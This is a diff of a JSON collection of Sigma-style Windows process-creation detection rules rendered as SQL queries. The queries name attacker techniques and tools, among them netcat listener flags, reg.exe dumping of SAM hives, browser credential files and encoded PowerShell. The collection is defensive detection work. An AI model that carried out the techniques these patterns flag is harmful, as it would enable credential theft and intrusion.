LIKE '%python -h%' ESCAPE '\\' OR 
CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Suspicious Where Execution", + "id": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", + "status": "experimental", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) 
as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\where.exe' ESCAPE '\\' OR OriginalFileName = 'where.exe') AND (CommandLine LIKE '%places.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%formhistory.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%logins.json%' ESCAPE '\\' OR CommandLine LIKE '%key4.db%' ESCAPE '\\' OR CommandLine LIKE '%key3.db%' ESCAPE '\\' OR CommandLine LIKE '%sessionstore.jsonlz4%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Login Data%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_where_browser_data_recon.yml" }, { - "title": "Abusing Findstr for Defense Evasion", - "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", - "status": "test", - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "title": "DLL Loaded via CertOC.EXE", + "id": "242301bc-f92f-4476-8718-78004a6efd9f", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to loads the 
target DLL file.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" + "attack.t1218" ], "falsepositives": [ - "Administrative findstr usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR NewProcessName LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_findstr.yml" + "filename": "proc_creation_win_certoc_load_dll.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + 
"Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", - "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "status": "experimental", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE 
'%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil 
\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", "attack.t1574.002" 
@@ -14675,1929 +14350,1873 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_renamed_vmnat.yml" - }, - { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" - ], - "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.005" + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR 
CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "description": "Detects suspicious renamed SysInternals DebugView execution", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. 
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Curl.EXE Execution", + "id": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "status": "test", + "description": "Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1095" + "attack.t1105" ], "falsepositives": [ - "Legitimate ncat use" + "Scripts created by developers and admins", + "Administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable'))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_curl_execution.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects creation of local users via the 
net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Suspicious Execution of InstallUtil To Download", - "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "status": "experimental", - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. 
The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_installutil_download.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Suspicious Diantz Alternate Data Stream Execution", - "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", - "status": "test", - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "author": "frack113", + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 
"attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Very Possible" + "Rare legitimate inline scripting by some administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diantz_ads.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "Pubprn.vbs Proxy Execution", + "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1216.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_lolbin_pubprn.yml" }, { 
- "title": "Remote Code Execute via Winrm.vbs", - "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "status": "test", - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "author": "Julia Fomina, oscd.community", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Legitimate use of Msra.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' 